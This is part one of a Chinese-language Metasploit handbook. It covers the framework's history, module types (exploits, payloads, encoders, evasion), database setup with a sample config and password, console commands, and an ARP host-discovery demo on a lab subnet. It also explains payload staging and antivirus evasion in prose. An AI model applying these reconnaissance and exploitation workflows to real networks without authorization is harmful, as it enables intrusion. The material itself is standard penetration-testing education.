Metasploit Framework Handbook

众所周知Metasploit工具是一款强大的渗透测试利器,在渗透测试中堪称一条龙服务,那么很多人真的能够认识到它其中的强大之处吗,了解其中的每部分功能吗,还是说在个别人眼中只是一个由虚拟机搭建的一个小拓扑使用其直接攻打windows主机拿到主机权限就结束了吗,事实上Metasploit这款工具能做的事情很多,包括:情报(信息)搜集、目标识别、服务枚举、漏洞探测、漏洞利用、权限提升、权限维持、社会工程、内网渗透等一系列操作。

由于网上大部分相关文章对于Metasploit框架没有一个整体而完整的讲解,很多都是讲述的某一个功能点或者漏洞的使用,比如:如何使用Metasploit进行内网代理渗透、如何使用Metasploit打开对方电脑摄像头、如何使用Metasploit监视对方主机、如何使用Metasploit利用永恒之蓝漏洞攻击Windows主机、Metasploit基础、Metasploit指令用法等等,这一现象也就造成了知识点的零碎、意乱,一定程度上导致初学者的盲目、误导等。

正因如此自己才打算总结整理一份关于Metasploit框架的使用手册:Metasploit Framework Handbook 主要讲述的是Metasploit框架的一个整体使用手册(包括工具模块的解读+实战操作),该手册主要分为四部分,如下:

  • 第一部分:Metasploit Framework Handbook (一)

Metasploit解读+实战操作(发展、框架、安装、配置、指令解读、情报搜集、渗透测试)

  • 第二部分:Metasploit Framework Handbook (二)

Meterpreter解读+实战操作(指令解读、内网渗透-后渗透-1)

  • 第三部分:Metasploit Framework Handbook (三)

Meterpreter解读+实战操作(内网渗透-后渗透-2)

  • 第四部分:Metasploit Framework Handbook (四)

MSFvenom解读+实战操作(指令解读、后门木门)

本文Metasploit Framework Handbook (一)主要讲述的是手册的第一部分:Metasploit解读+实战操作(发展、框架、安装、配置、指令解读、情报搜集、渗透测试)

MsFramework

Metasploit

Metasploit 是一个的渗透测试开源软件,也是一个逐步发展成熟的漏洞研究与渗透测试代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。

  • 官方相关链接
官网 https://www.rapid7.com/ Github https://github.com/rapid7/metasploit-framework 

Metasploit 项目最初是由 HD Moore 在 2003 年夏季创立,目标是成为渗透攻击研究与代码开发的一个开放资源(工具集,武器库)。当时HD还是Digital Defense安全公司雇员,当他意识到他的绝大多数时间是在用来验证和处理那些公开发布的渗透代码时,他开始为编写和开发渗透代码构建一个灵活且可维护的框架平台,并在2003年10 月发布了他的第一个基于 Perl 语言(pl)的 Metasploit 版本,当时一共集成了 11 个渗透攻击模块。

虽然Metasploit在设计之初就具有宏伟的目标,但在v1.0发布之后并没有引起太多的关注,在SecurityFocus的渗透测试邮件组中的发布邮件仅仅只有一个回复,当时的Metasploit v1.0看起来仅仅是将大家都能获取的11个渗透代码打了一个包而已。但这次发布使得HD Moore吸引了一位志同道合之士Spoonm,他帮助HD一起完全重写了代码,并在2004年4月发布了Metasploit v2.0,版本中已经包含18个渗透攻击模块和27个攻击载荷模块,并提供了控制台终端、命令行和Web三个使用接口。

在 2004 年 8 月,HD 和 Spoonm 带着最新发布的 Metasploit v2.2 并在拉斯维加斯举办的 BlackHat 全球黑客大会上进行了演讲。听众被 Metasploit 的强大之处所折服,并一致认为:Metasploit 时代已经到来。更多的黑客加入 Metasploit 核心开发团队与贡献渗透攻击、载荷与辅助模块代码。

在Metasploit项目进入一个发展快车道时,HD Moore与Spoonm已经敏锐地意识到了其中存在的危机。在2005年的CanSecWest黑客会议上,他们指出Metasploit v2体系框架中的一些难以解决的难题,包括:

缺乏跨平台支持,特别是不能很好地运行在 Windows 系统上。 很难支持自动化渗透攻击过程 Perl 语言的复杂性和缺点使得外部贡献者与用户规模增长不相适应 Perl 语言对一些复杂特性的支持能力较弱等。 

而且 v2 版本是完全围绕着渗透攻击而设计的,对信息搜集与后渗透攻击阶段无法提供有效支持。经过 18 个月的时间,Metasploit 团队使用 Ruby 语言(.rb)完全重写了 Metasploit ,并在 2007 年 5 月发布了 v3.0 版本,其中包含 177 个渗透攻击模块、104 个攻击载荷模块以及 30 个新引入的辅助模块。

Metasploit v3.0 的发布使得 Metasploit 不在限于用作渗透攻击软件,而真正成为一个事实上的渗透测试技术研究与开发平台。黑客们开始接受并使用Metasploit渗透攻击模块的编程语言和格式发布他们的渗透代码,并以Metasploit框架为平台开发一些新的攻击工具,以及将之前的安全工具移植到Metasploit中。

Metasploit v3.3版本时已经快速发展到796个模块、41.9 万行代码,成为全世界最大的Ruby语言开发项目。而Metasploit v3不断扩充的功能与特性,以及与其他安全工具之间的灵活API接口,也为渗透测试者们提供一个绝 佳的渗透软件平台,Metasploit 在安全社区取得了更加广泛的用户群。

2009 年 10 月,Metasploit 项目被一家渗透测试技术领域的知名安全公司 Rapid7 所收购,HD Moore全职加人Rapid7,担任首席安全官和Metasploit首席架构师。其他一些Metasploit开发团队的人员也全职加人到Rapid7公司中。由HD Moore带领专门从事Metasploit的开发,而Metasploit框架仍然保持开源发布和活跃的社区参与,这使得收购之后Metasploit的更新比所有人预期的都还要快。当然,Rapid7公司也从收购Metasploit中得到很大的好处,进一步推广公司的旗舰漏洞扫描产品NetXpose。随后于2010年10月推出MetasploitExpress和Pro商业版本,从而进军商业化渗透测试解决方案市场。

Metasploit v4.0 在 2011 年 8 月发布。v4.0 版本在渗透攻击、攻击载荷与辅助模块的数量上都有显著的扩展,此外还引入一种新的模块类型——后渗透攻击模块,以支持在渗透攻击环节中进行敏感信息搜集、内网拓展等一系列的攻击测试。

Metasploit v5.0 在 2019 年 1 月份发布。Metasploit 5.0 使用了新的数据库,并提供了一种新的数据服务。新版本引入了新的规避机制(evasion capabilities),支持多项语言,框架建立在不断增长的世界级攻击性内容库的框架基础上。另外,此次更新还包括了可用性改进和大规模开发的支持,数据库和自动化 API 的改进等。

Metasploit的设计尽可能采用模块化的理念,以提升代码复用效率。在基础库文件(Libraries)中提供了核心框架和一些基础功能的支持。而实现渗透测试功能的主体代码则以模块化方式组织,并按照不同用途分为7种类型的模块(Modules) ;为了扩充Metasploit框架对渗透测试全过程的支持功能特性,Metasploit 还引入了插件(Plugins) 机制,支持将外部的安全工具集成到框架中; Metasploit 框架对集成模块与插件的渗透测试功能,通过用户接口(Interfaces) 与功能程序(Utilities) 提供给渗透测试者和安全研究人员进行使用。

 → Qftm :/usr/share/metasploit-framework/modules auxiliary encoders evasion exploits nops payloads post → Qftm :/usr/share/metasploit-framework/modules 

辅助模块

  • auxiliary
 → Qftm :/usr/share/metasploit-framework/modules/auxiliary admin bnat cloud docx example.rb fuzzers parser scanner sniffer sqli vsploit analyze client crawler dos fileformat gather pdf server spoof voip → Qftm :/usr/share/metasploit-framework/modules/auxiliary 

Metasploit 为渗透测试的信息搜集环节提供了大量的辅助模块支持,包括针对各种网络服务的扫描与查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz 测试发掘漏洞、实施网络协议欺骗等模块。辅助模块能够帮助渗透测试者在渗透攻击之前取得目标系统丰富的情报信息,从而发起更具目标性的精准攻击。

渗透攻击模块

  • exploits
 → Qftm :/usr/share/metasploit-framework/modules/exploits aix bsd example_linux_priv_esc.rb firefox irix multi osx solaris android bsdi example.rb freebsd linux netware qnx unix apple_ios dialup example_webapp.rb hpux mainframe openbsd self windows → Qftm :/usr/share/metasploit-framework/modules/exploits 

渗透攻击模块是利用发现的安全漏洞或配置弱点对目标系统进行攻击,以植入和运行攻击载荷,从而获取对远程目标系统访问权的代码组件。

Metasploit框架中渗透攻击模块可以按照所利用的安全漏洞所在的位置分为主动渗透攻击与被动渗透攻击两大类。

  • 主动渗透攻击

主动渗透攻击所利用的安全漏洞位于网络服务端软件与服务承载的上层应用程序之中,由于这些服务通常是在主机上开启一些监听端口并等待客户端连接,因此针对它们的渗透攻击可以主动发起,通过连接目标系统网络服务,注入一些特殊构造的包含”邪恶”攻击数据的网络请求内容,触发安全漏洞,并使得远程服务进程执行在”邪恶”数据中包含攻击载荷,从而获取目标系统的控制会话。

  • 被动渗透攻击

被动渗透攻击利用的漏洞位于客户端软件中,如浏览器、浏览器插件、电子邮件客户端、Office 与 Adobe 等各种文档阅读与编辑软件。对于这类存在于客户端软件的安全漏洞,我们无法主动地将数据从远程输入到客户端软件中,因此只能采用被动渗透攻击的方式,即构造出”邪恶”的网页、电子邮件或文档文件,并通过架设包含此类恶意内容的服务、发送邮件附件、结合社会工程学分发并诱骗目标用户打开、结合网络欺骗和劫持技术等方式,等目标系统上的用户访问到这些邪恶的内容,从而触发客户端软件中的安全漏洞,给出控制目标系统的 Shell 会话。

攻击载荷模块

  • payloads

    → Qftm :/usr/share/metasploit-framework/modules/payloads singles stagers stages → Qftm :/usr/share/metasploit-framework/modules/payloads 

攻击载荷是在渗透攻击成功后使目标系统运行的一段植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。

Metasploit攻击载荷模块分为独立(Singles)、传输器(Stager)、传输体(Stage)

独立攻击载荷是完全自包含的,可直接独立地植人目标系统进行执行,比如“windows/shell_bind_tcp”是适用于Windows操作系统平台,能够将Shell控制会话绑定在指定TCP端口上的攻击载荷。在一些比较特殊的渗透攻击场景中,可能会对攻击载荷的大小、运行条件有所限制,比如特定安全漏洞利用时可填充邪恶攻击缓冲区的可用空间很小、Windows 7等新型操作系统所引人的NX (堆栈不可执行)、DEP (数据执行保护)等安全防御机制,在这些场景情况下,Metasploit 提供了传输器(Stager) 和传输体(Stage)配对分阶段植入的技术,由渗透攻击模块首先植人代码精悍短小且非常可靠的传输器载荷,然后在运行传输器载荷时进一步下载传输体载荷并执行。目前Metasploit中的Windows传输器载荷可以绕过NX、DEP等安全防御机制,可以兼容Windows7操作系统,而由传输器载荷进一步下载并执行的传输体载荷就不再受大小和安全防御机制的限制,可以加载如Meterpreter、VNC桌面控制等复杂的大型攻击载荷。传输器与传输体配对的攻击载荷模块以名称中的“/”标识,“windows/shell/bind_tcp"是由一个传输器载荷(bind_tcp) 和一个传输体载荷(Shell) 所组成的,其功能等价于独立攻击载荷“windows/shell_bind_tcp"。Metasploit所引人的多种类型载荷模块使得这些预先编制的模块化载荷代码能够适用于绝大多数的平台和攻击场景,这也为Metasploit能够成为通用化的渗透攻击与代码开发平台提供了非常有力的支持。

空指令模块

  • nops
 → Qftm :/usr/share/metasploit-framework/modules/nops aarch64 armle mipsbe php ppc sparc tty x64 x86 → Qftm :/usr/share/metasploit-framework/modules/nops 

空指令(NOP) 是一些对程序运行状态不会造成任何实质影响的空操作或者无关操作指令,最典型的空指令就是空操作,在 x86 CPU 体系架构平台上的操作码是 0x90 。

在渗透攻击构造邪恶数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区,这样当触发渗透攻击后跳转执行Shellcode 时,有一个较大的安全着陆区,从而避免受到内存地址随机化、返回地址计算偏差等原因造成的Shellcode执行失败,提高渗透攻击的可靠性。Metasploit 框架中的空指令模块就是用来在攻击载荷中添加空指令区,以提高攻击可靠性的组件。

编码器模块

  • encoders
 → Qftm :/usr/share/metasploit-framework/modules/encoders cmd generic mipsbe mipsle php ppc ruby sparc x64 x86 → Qftm :/usr/share/metasploit-framework/modules/encoders 

攻击载荷模块与空指令模块组装完成一个指令序列后,在这段指令被渗透攻击模块加入邪恶数据缓冲区交由目标系统运行之前,Metasploit 框架还需要完成一道非常重要的工序 – 编码(Encoding)。如果没有这道工序,渗透攻击可能完全不会奏效,或者中途就被检测到并阻断。这道工序是由编码器模块所完成的。

编码器模块的第一个使命是确保攻击载荷中不会出现滲透攻击过程中应加以避免的“坏字符”,这些“坏字符”的存在将导致特殊构造的邪恶数据缓冲区无法按照预期目标完输人到存有漏洞的软件例程中,从而使得渗透攻击触发漏洞之后无法正确执行攻击载荷,达成控制系统的目标。

编码器的第二个使命就是对攻击载荷进行”免杀”处理,即逃避反病毒软件、IDS 人侵检测系统和IPS人侵防御系统的检测与阻断。

后渗透攻击模块

  • post
 → Qftm :/usr/share/metasploit-framework/modules/post aix android apple_ios brocade bsd cisco firefox hardware juniper linux multi osx solaris windows → Qftm :/usr/share/metasploit-framework/modules/post 

后渗透攻击模块主要支持在渗透攻击取得目标系统控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。

在后渗透攻击阶段,Metasploit框架中功能最强大、最具发展前景的模块是Meterpreter,Meterpreter 作为可以被渗透攻击植入到目标系统上执行的一个攻击载荷,除了提供基本的控制会话之外,还集成了大量的后渗透攻击命令与功能,并通过大量的后渗透攻击模块进一步提升它在本地攻击与内网拓展方面的能力。

免杀模块

  • evasion
 → Qftm :/usr/share/metasploit-framework/modules/evasion windows → Qftm :/usr/share/metasploit-framework/modules/evasion 

免杀模块核心功能对攻击载荷进行”免杀”处理。

渗透攻击是目前 Metasploit 最强大和最具吸引力的核心功能,Metasploit 框架中集成了数百个针对主流操作系统平台上,不同网络服务与应用软件安全漏洞的渗透攻击模块,可以由用户在渗透攻击场景中根据漏洞扫描结果进行选择,并能够自由装配该平台上适用的具有指定功能的攻击载荷,然后通过自动化编码机制绕过攻击限制与检测措施,对目标系统实施远程攻击,获取系统的访问控制权。

除了渗透攻击之外,Metasploit 在发展过程中逐渐增加对渗透测试全过程的支持,包括情报搜集、威胁建模、漏洞分析、后渗透攻击与报告生成。

情报搜集阶段

Metasploit 一方面通过内建的一系列扫描器与查点辅助模块来获取远程服务器信息,另一方面通过插件机制集成调用 Nmap、Nessus、OpenVAS 等业界著名的开源网络扫描工具,从而具备全面的信息搜集能力,为渗透攻击实施提供必不可少的精确情报。

目标识别与服务枚举 集成插件,漏洞扫描 

威胁建模阶段

在搜集信息之后,Metasploit 支持一系列数据库命令操作直接将这些信息汇总至PostgreSQL、MySQL、SQLite 数据库中,并为用户提供易用的数据库查询命令,可以帮助渗透测试者对目标系统搜索到的情报进行威胁建模,从中找出最可行的攻击路径。

漏洞分析阶段

除了信息搜集环节能够直接扫描出一些已公布的安全漏洞之外,Metasploit 中还提供了大量的协议 Fuzz 测试器与 Web 应用漏洞探测分析模块,支持具有一定水平能力的渗透测试者在实际过程中尝试挖掘出 0Day 漏洞,并对漏洞机理与利用方法进行深入分析,而这将为渗透攻击目标带来更大的杀伤力,并提升渗透测试流程的技术含金量。

后渗透攻击阶段

在成功实施渗透攻击并获得目标系统的远程控制权之后,Metasploit 框架中另一个极具威名的工具 Meterpreter 在后渗透攻击阶段提供了强大功能。

Meterpreter 可以看作一个支持多操作系统平台,可以仅仅驻留于内存中并具备免杀能力的高级后门工具,Meterpreter 中实现了特权提升、信息提取、系统监控、跳板攻击与内网拓展等多样化的功能特性,此外还支持一种灵活可扩展的方式来加载额外功能的后渗透攻击模块。

报告生成阶段

Metasploit 框架获得的渗透测试结果可以输入至内置数据库中,因此这些结果可以通过数据查询来获取,并辅助渗透测试报告的写作。

商业版的 Metasploit Pro 具备了更加强大的报告生成功能,可以输出 HTML、XML、Word和 PDF 格式的报告。

  • 官方安装Wiki
https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers 
  • 以Debian-kali为例

MSF 安装路径 /usr/share/metasploit-framework,如果使用msf自带的更新组件msfupdate会显示更新失败不再支持

 → Qftm :~/Desktop msfupdate is no longer supported when Metasploit is part of the operating system. Please use 'apt update; apt install metasploit-framework' → Qftm :~/Desktop 

使用系统apt包管理工具进行更新

sudo apt-get update sudo apt-get install metasploit-framework 

数据库连接

自动配置连接数据库

  • 启动postgresql数据库服务
 → Qftm :~/Desktop ● postgresql.service - PostgreSQL RDBMS Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled) Active: inactive (dead) → Qftm :~/Desktop → Qftm :~/Desktop ● postgresql.service - PostgreSQL RDBMS Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled) Active: active (exited) since Wed 2020-06-24 03:24:56 EDT; 3s ago Process: 4575 ExecStart=/bin/true (code=exited, status=0/SUCCESS) Main PID: 4575 (code=exited, status=0/SUCCESS) Jun 24 03:24:56 Pentesting systemd[1]: Starting PostgreSQL RDBMS... Jun 24 03:24:56 Pentesting systemd[1]: Started PostgreSQL RDBMS. → Qftm :~/Desktop 
  • msf连接配置

初始化msfdb

 → Qftm ← :~ [+] Starting database [+] Creating database user 'msf' 为新角色输入的口令: 再输入一遍: [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema → Qftm ← :~ 

启动MSF查看数据库连接情况

 → Qftm :~/Desktop MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM https://metasploit.com =[ metasploit v5.0.93-dev ] + -- --=[ 2029 exploits - 1100 auxiliary - 344 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Display the Framework log using the log command, learn more with help log [*] Starting persistent handler(s)... msf5 > msf5 > db_status [*] Connected to msf. Connection type: postgresql. msf5 > 

如果要设置自动登录,需要修改配置文件/usr/share/metasploit-framework/config/database.yml,默认初始化已经配置好了。

production: adapter: postgresql database: msf username: msf password: n1CV4/9NcMUEvg4x90GhPOV6EfPBX/Ai7gY1a2fNdZQ= host: localhost port: 5432 pool: 5 timeout: 5 

手工配置连接数据库

  • 启动postgresql数据库服务
 → Qftm :~/Desktop ● postgresql.service - PostgreSQL RDBMS Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled) Active: inactive (dead) → Qftm :~/Desktop → Qftm :~/Desktop ● postgresql.service - PostgreSQL RDBMS Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled) Active: active (exited) since Wed 2020-06-24 03:24:56 EDT; 3s ago Process: 4575 ExecStart=/bin/true (code=exited, status=0/SUCCESS) Main PID: 4575 (code=exited, status=0/SUCCESS) Jun 24 03:24:56 Pentesting systemd[1]: Starting PostgreSQL RDBMS... Jun 24 03:24:56 Pentesting systemd[1]: Started PostgreSQL RDBMS. → Qftm :~/Desktop 
  • 进入postgresql配置

设置数据库账户密码:postgres:adminp

 → Qftm :~/Desktop sudo: unable to resolve host Pentesting: Name or service not known psql (12.1 (Debian 12.1-2)) Type "help" for help. postgres= ALTER ROLE postgres= → Qftm :~/Desktop 
  • 设置账户认证方式
 → Qftm :~/Desktop password_encryption = md5  → Qftm :~/Desktop 
  • 重启数据库服务
 → Qftm :~/Desktop → Qftm :~/Desktop ● postgresql.service - PostgreSQL RDBMS Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled) Active: active (exited) since Wed 2020-06-24 03:35:54 EDT; 4s ago Process: 4734 ExecStart=/bin/true (code=exited, status=0/SUCCESS) Main PID: 4734 (code=exited, status=0/SUCCESS) Jun 24 03:35:54 Pentesting systemd[1]: Starting PostgreSQL RDBMS... Jun 24 03:35:54 Pentesting systemd[1]: Started PostgreSQL RDBMS. → Qftm :~/Desktop 
  • 连接数据库
 → Qftm :~/Desktop Password for user postgres: psql (12.1 (Debian 12.1-2)) SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off) Type "help" for help. postgres= 
  • 新建数据库
postgres= ERROR: role "msf" already exists postgres= postgres= ERROR: database "msf" already exists postgres= 
  • msf连接配置

启动msf控制台,输入db_status查看数据库连接状态

 → Qftm :~/Desktop .:okOOOkdc' 'cdkOOOko:. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO' oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx lOOOOOOOO. ;d; ,OOOOOOOOl .OOOOOOOO. .; ; ,OOOOOOOO. cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc oOOOOOO. .OOOO. :OOOO. ,OOOOOOo lOOOOO. .OOOO. :OOOO. ,OOOOOl ;OOOO' .OOOO. :OOOO. ;OOOO; .dOOo .OOOOocccxOOOO. xOOd. ,kOl .OOOOOOOOOOOOO. .dOk, :kk;.OOOOOOOOOOOOO.cOk: ;kOOOOOOOOOOOOOOOk: ,xOOOOOOOOOOOx, .lOOOOOOOl. ,dOd, . =[ metasploit v5.0.93-dev ] + -- --=[ 2029 exploits - 1100 auxiliary - 344 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Display the Framework log using the log command, learn more with help log [*] Starting persistent handler(s)... msf5 > db_status [*] Connected to msf. Connection type: postgresql. msf5 > 

可以看到数据库已经自动连接上了,如果没有,就需要手动输入以下命令连接

msf5 > db_connect msf:adminp@127.0.0.1/msf 

notes

msf:数据库名 adminp:密码 @:固定格式 127.0.0.1:登录地址 

如果要设置自动登录,需要修改配置文件/usr/share/metasploit-framework/config/database.yml

production: adapter: postgresql database: msf username: msf password: n1CV4/9NcMUEvg4x90GhPOV6EfPBX/Ai7gY1a2fNdZQ= host: localhost port: 5432 pool: 5 timeout: 5 

启动msf

 → Qftm :~/Desktop# msfconsole _ _ / / __ _ __ /_/ __ | | / | _____ ___ _____ | | / _ | | /| | | ___ |- -| / / __ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / - __ | | | | __/| | | |_ |/ |____/ ___/ / \___/ / __| |_ ___ =[ metasploit v5.0.93-dev ] + -- --=[ 2029 exploits - 1100 auxiliary - 344 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Open an interactive Ruby terminal with irb [*] Starting persistent handler(s)... msf5 > 

命令解读

  • MSF Console Command
msf5 > help Core Commands ============= Command Description ------- ----------- ? 帮助手册 banner 展示Metasploit框架信息 cd 改变当前工作目录 color 切换颜色(true|false|auto) connect 远程连接-与主机通信 exit 退出Metasploit终端控制台 get 获取特定上下文变量的值 getg 获取一个全局变量的值 grep grep另一个命令的输出 help 帮助手册 history 查看Metasploit控制台中使用过的历史命令 load 加载框架中的插件 quit 退出Metasploit终端控制台 repeat Repeat a list of commands route Route traffic through a session save 保存活动的数据存储 sessions 显示会话列表和有关会话的信息(sessions -h 列出sessions命令的帮助信息 sessions -i 查看所有的会话(基本信息) sessions -v 列出所有可用交互会话及会话详细信息 sessions -i id 通过 ID 号,进入某一个交互会话 exit 直接退出会话 background 将会话隐藏在后台 sessions -K 杀死所有存活的交互会话) set 设置一个特定的上下文变量(选项)的值 setg 设置一个全局变量的值 sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads 查看和操作后台线程 tips Show a list of useful productivity tips unload 卸载已加载框架插件 unset 取消设置的一个或多个特定的上下文变量 unsetg 取消设置的一个或多个全局变量的 version 查看框架和控制台库版本号 Module Commands =============== Command Description ------- ----------- advanced 显示一个或多个模块的高级(详细)选项 back 从当前上下文返回(退出当前正在使用的模块,返回原始控制台(模块的配置依然有效)) clearm 清除该模块的堆栈信息 info 显示有关一个或多个模块的信息 listm 显示该模块的堆栈信息 loadpath 从路径搜索并加载模块 options 显示一个或多个模块的全局选项信息(option|show option) popm 将最新模块弹出堆栈并使其激活 previous 将先前加载的模块设置为当前模块 pushm 将活动模块或模块列表推入模块堆栈 reload_all 从所有定义的模块路径重新加载所有模块 search 搜索相关模块的名称和描述(search cve:2009 type:exploit platform:-linux) show 查看显示给定类型的模块,或所有模块(show exploits|post|nop...) use 装载一个渗透攻击或者模块 (use ModuleName use exploit/windows/smb/ms17_010_eternalblue info 查看模块的详细信息 options 查看脚本配置选项 show options 查看脚本配置选项 show targets 显示适用的主机类型 set 设置模块选项 run 启动脚本 exploit 启动脚本) Job Commands(作业==运行的模块) ============ Command Description ------- ----------- handler 启动有效负载处理程序作为作业进程 jobs 查看和管理作业进程(查看和管理当前运行的模块) kill 关闭|杀死一个作业进程 rename_job 重命名作业进程 Resource Script Commands ======================== Command Description ------- ----------- makerc 将启动控制台以后要输入的命令保存到文件中(批处理文件) resource 运行存储在文件中的命令(运行批处理文件) Database Backend Commands ========================= Command Description ------- ----------- analyze 分析有关特定地址或地址范围的数据库信息 db_connect 连接到现有的数据库服务(db_connect msf:adminp@127.0.0.1/msf) db_disconnect 断开当前数据库服务 db_export 导出包含数据库内容的文件 db_import 导入扫描结果文件(将自动检测文件类型) db_nmap 执行nmap并自动记录输出到数据库中(集成的nmap,对nmap的一个封装) db_rebuild_cache 重建数据库存储的模块缓存(不建议使用) db_remove 删除保存的数据库服务条目 db_save 将当前数据库服务连接保存为默认值,以便在启动时重新连接 db_status 显示当前数据库服务状态 hosts 列出数据库中的所有主机 loot 列出数据库中的所有战利品 notes 列出数据库中的所有注释 services 列出数据库中的所有服务 vulns 列出数据库中的所有漏洞 workspace 在数据库工作区之间切换 Credentials Backend Commands ============================ Command Description ------- ----------- creds 列出数据库中的所有凭据 Developer Commands ================== Command Description ------- ----------- edit 使用首选编辑器编辑当前模块或文件 irb 在当前上下文中打开一个交互式Ruby Shell log 如果可能,将framework.log显示到页面末尾(查看日志信息) pry 在当前模块或框架上打开Pry调试器 reload_lib 从指定路径重新加载Ruby库文件 
  • MSF Console Module Command
msf5 auxiliary(xxx/xxx/xxx) > help Auxiliary Commands ================== Command Description ------- ----------- check 检查目标是否存在漏洞 exploit run命令的别名 rcheck 重新加载该辅助模块并检查目标是否存在漏洞 recheck rcheck命令的别名 reload 重新加载该辅助模块(已配置的选项还在) rerun 重新加载该辅助模块并运行该模块 rexploit rerun命令的别名 run 运行选中的辅助模块 msf5 exploit(xxx/xxx/xxx) > help Exploit Commands ================ Command Description ------- ----------- check 检查目标是否存在漏洞 exploit 对目标发起攻击 rcheck 重新加载该辅助模块并检查目标是否存在漏洞 recheck rcheck命令的别名 reload 重新加载该渗透攻击模块(已配置的选项还在) rerun rexploit命令的别名 rexploit 重新加载该渗透攻击模块并运行该模块对目标发起攻击 run exploit命令的别名 msf5 payload(xxx/xxx/xxx) > help Payload Commands ================ Command Description ------- ----------- check 检查目标是否存在漏洞 generate Generates a payload reload 从磁盘重新加载当前模块 to_handler 创建具有指定有效负载的处理程序 

主机发现

Metasploit 中提供了一些辅助模块可用于主机发现,这些模块位于modules/auxiliary/scanner/discovery/ 目录中。

use auxiliary/scanner/discovery/arp_sweep use auxiliary/scanner/discovery/empty_udp use auxiliary/scanner/discovery/ipv6_multicast_ping use auxiliary/scanner/discovery/ipv6_neighbor use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement use auxiliary/scanner/discovery/udp_probe use auxiliary/scanner/discovery/udp_sweep 

使用 arp 请求来枚举本地局域网中的所有活跃主机

msf5 > use auxiliary/scanner/discovery/arp_sweep msf5 auxiliary(scanner/discovery/arp_sweep) > options Module options (auxiliary/scanner/discovery/arp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- INTERFACE no The name of the interface RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SHOST no Source IP Address SMAC no Source MAC Address THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 5 yes The number of seconds to wait for new data msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.33.6.0/24 rhosts => 192.33.6.0/24 msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 50 threads => 50 msf5 auxiliary(scanner/discovery/arp_sweep) > set timeout 2 timeout => 2 msf5 auxiliary(scanner/discovery/arp_sweep) > show options Module options (auxiliary/scanner/discovery/arp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- INTERFACE no The name of the interface RHOSTS 192.33.6.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SHOST no Source IP Address SMAC no Source MAC Address THREADS 50 yes The number of concurrent threads (max one per host) TIMEOUT 2 yes The number of seconds to wait for new data msf5 auxiliary(scanner/discovery/arp_sweep) > run [+] 192.33.6.1 appears to be up (VMware, Inc.). [+] 192.33.6.2 appears to be up (VMware, Inc.). [+] 192.33.6.151 appears to be up (VMware, Inc.). [+] 192.33.6.200 appears to be up (VMware, Inc.). [+] 192.33.6.254 appears to be up (VMware, Inc.). [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/discovery/arp_sweep) > 

除了使用内置的辅助模块也可以通过控制台调用系统工具netdiscover来探测主机

msf5 auxiliary(scanner/discovery/arp_sweep) > netdiscover -r 192.33.6.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 18 Captured ARP Req/Rep packets, from 5 hosts. Total size: 1080 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.33.6.1 00:50:56:c0:00:08 1 60 VMware, Inc. 192.33.6.2 00:50:56:f0:2a:96 5 300 VMware, Inc. 192.33.6.151 00:0c:29:fb:6f:2e 5 300 VMware, Inc. 192.33.6.200 00:0c:29:8c:0f:dd 6 360 VMware, Inc. 192.33.6.254 00:50:56:e3:b4:52 1 60 VMware, Inc. 

